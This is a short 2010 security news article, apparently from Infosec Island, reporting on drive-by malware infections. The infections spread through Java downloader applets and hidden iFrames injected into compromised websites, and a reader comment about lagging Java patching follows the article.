Java Applet Distributes Trojan via Downloader Injection

Friday, December 31, 2010



More than two-thousand weblinks direct users to domains that can inject malicious code by way of a Java downloader applet.

The code is contained in the HTML of the infected sites, and infects the visitor's computers with a hidden iFrame containing a JavaScript function.

The tactic uses an OpenConnection-type downloader exploit used in website doorways and landing pages, and use of the method has increased dramatically over the last several months.

“The Top 20 malicious programs detected on the Internet in November included a total of nine exploits, three redirects and one script downloader that were used for carrying out drive-by downloads,” notes Vyacheslav Zakorzhevsky, a researcher at Kaspersky Lab.

Java-based exploits are common and extremely successful because of the script's cross-platform utilization.

The infection methodology is commonly referred to as a "drive-by" infection, which exploit vulnerabilities in legitimate websites.

They typically use an IFrame to inject a redirect scrip from another domain, which results in the execution of malicious files to the targeted system.

The Java downloader applet injection differs from the iFrame script exploits in that they rely on the Java OpenConnection to infect the target computer.

Java exploits are proving to be a major vehicle for the delivery of malware, and the problem only seems to be getting worse.


Possibly Related Articles:
Java Trojans malware Javascript Attack iFrame Injection Headlines downloader OpenConnection
Post Rating I Like this!
Fred Williams The solution seems to be to keep up with the Java patches similar to Windows patches. The problem is that application compatibility concerns prevent our shop from patching Java everytime a new update comes out.

Luckily, we are on Java 6 v. 21. A recent Slashdot story that I read indicates that many, many companies are still stuck on Java 1.4, especially larger companies. This problem could become a bigger attack vector in the future as malicious users try to find other doors into a company.
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.